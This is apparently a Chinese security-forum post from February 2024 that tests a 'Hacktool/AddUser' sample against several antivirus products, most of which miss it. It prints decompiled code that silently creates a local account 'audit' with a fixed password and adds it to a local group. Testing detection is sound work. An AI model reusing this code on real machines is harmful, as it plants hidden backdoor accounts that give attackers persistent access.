本帖最后由 UNknownOoo 于 2024-2-19 21:48 编辑
Hacktool/AddUser
火绒
扫描&运行:MISS,被添加账户
X-Sec
扫描:MISS
华为乾坤
扫描&运行:MISS。被添加账户
WV
运行:拦截
冰盾
运行:MISS
- *(_QWORD *)buf = L"audit";
- *(_QWORD *)&buf[8] = L"Aa123456";
- *(_DWORD *)&buf[20] = 1;
- *(_DWORD *)&buf[40] = 513;
- *(_QWORD *)&buf[48] = 0i64;
- v10 = NetUserAdd(0i64, 1u, buf, 0i64);
- if ( v10 )
- {
- wprintf(L"NetUserAdd FAIL %d 0x%08x\r\n", v10, v10);
- return v10;
- }
- else if ( LookupAccountNameW(0i64, L"audit", Sid, &cbSid, ReferencedDomainName, &cchReferencedDomainName, &peUse) )
- {
- *(_QWORD *)v6 = Sid;
- v10 = NetLocalGroupAddMembers(0i64, "A", 0, v6, 1u);
- if ( v10 )
- {
- wprintf(L"NetLocalGroupAddMembers FAIL %d 0x%08x\r\n", v10, v10);
- return v10;
- }
- else
- {
- return 0i64;
- }
- }
- else
- {
- LastError = GetLastError();
- wprintf(L"LookupAccountName FAIL %d 0x%08x\r\n", LastError, LastError);
- return LastError;
- }
复制代码
|